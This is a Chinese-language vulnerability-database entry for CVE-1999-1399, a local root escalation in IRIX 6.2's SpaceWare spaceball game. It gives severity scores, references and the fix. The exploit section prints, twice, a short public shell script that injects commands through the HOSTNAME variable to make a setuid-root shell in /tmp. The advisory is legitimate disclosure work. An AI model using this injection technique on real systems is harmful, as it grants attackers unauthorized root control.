CVE-1999-1399
CVSS7.2
发布时间 :1997-08-20 00:00:00
修订时间 :2016-10-17 22:04:03
NMCOES    

[原文]spaceball program in SpaceWare 7.3 v1.0 in IRIX 6.2 allows local users to gain root privileges by setting the HOSTNAME environmental variable to contain the commands to be executed.


[CNNVD]IRIX SpaceWare spaceball权限许可和访问控制漏洞(CNNVD-199708-010)

        IRIX 6.2下SpaceWare 7.3 v1.0的spaceball程序存在漏洞。本地用户可以通过设置HOSTNAME环境变量获得根权限,从而控制将要执行的命令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1399
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1399
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199708-010
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=87602746719552&w=2
(UNKNOWN)  BUGTRAQ  19970820 SpaceWare 7.3 v1.0
http://www.securityfocus.com/bid/471
(VENDOR_ADVISORY)  BID  471

- 漏洞信息

IRIX SpaceWare spaceball权限许可和访问控制漏洞
高危 未知
1997-08-20 00:00:00 2005-10-20 00:00:00
本地  
        IRIX 6.2下SpaceWare 7.3 v1.0的spaceball程序存在漏洞。本地用户可以通过设置HOSTNAME环境变量获得根权限,从而控制将要执行的命令。

- 公告与补丁

        Removal of this game is recommended. Alternatively, one can edit the spaceball.sh script to set the HOSTNAME using /usr/bsd/hostname.
        Patches for this and other vulnerabilities are availiable from SGI at
        http://support.sgi.com

- 漏洞信息 (19357)

SGI IRIX 6.2 SpaceWare Vulnerability (EDBID:19357)
irix dos
1996-10-30 Verified
0 J.A. Guitierrez
N/A [点击下载]
source: http://www.securityfocus.com/bid/471/info

The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands.

#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
/tmp/sh

		

- 漏洞信息

6333
spaceware spaceball HOSTNAME Variable Arbitrary Privileged Command Execution
Local Access Required Input Manipulation
Loss of Integrity Workaround
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1997-08-20 Unknow
1997-08-20 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

IRIX SpaceWare Vulnerability
Unknown 471
No No
1996-10-30 12:00:00 2009-07-11 12:56:00
This vulnerability was found by J.A. Guitierrez <spd@GTC1.CPS.UNIZAR.ES>, and reported to the Bugtraq mailing list on August 20, 1997.

- 受影响的程序版本

SGI IRIX 6.2

- 漏洞讨论

The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands.

- 漏洞利用

#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" $SWDIR/spaceball &gt; /dev/null 2&gt;&amp;1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" $SWDIR/spaceball &gt; /dev/null 2&gt;&amp;1
/tmp/sh

- 解决方案

Removal of this game is recommended. Alternatively, one can edit the spaceball.sh script to set the HOSTNAME using /usr/bsd/hostname.

Patches for this and other vulnerabilities are availiable from SGI at http://support.sgi.com

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站